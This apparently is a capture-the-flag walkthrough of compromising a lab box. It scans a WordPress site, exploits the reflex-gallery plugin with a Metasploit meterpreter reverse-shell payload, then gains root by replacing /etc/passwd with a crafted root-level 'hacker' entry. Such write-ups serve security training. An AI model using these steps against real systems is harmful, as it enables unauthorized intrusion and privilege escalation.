Scanning the box with nmap –A –T4 –p- 192.168.1.10 –vv
Now we scan it with dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt
As we can see the box is running a WordPress service so we going to scan it with wpscan –url http://192.168.1.10/wordpress -e
Running the command again but with enumerating plugins came with:
One of the plugins reflex-gallery is an exploit we can use it in Metasploit if we search for reflex-gallery:
use exploit/unix/webapp/wp_reflexgallery_file_upload
set target /wordpress
set payload php/meterpreter/reverse_tcp
cd /home/raj and cat the flag
Next is using the LinEnum.sh script and it came through:
as we can see, we can use cp command, so we are going to copy our passwd file to the box and replace it so we can become root,
we can create a new user on our machine with root privilege to become root.
Now add the user and hash at the end of the passwd file and copy it to your home folder
hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:root:/root:/bin/bash
Now we’ve created a new user hacker, we going to copy our passwd file to the target box using python –m SimpleHTTPServer 80:
Now just type su hacker then the password 123456 and you are root
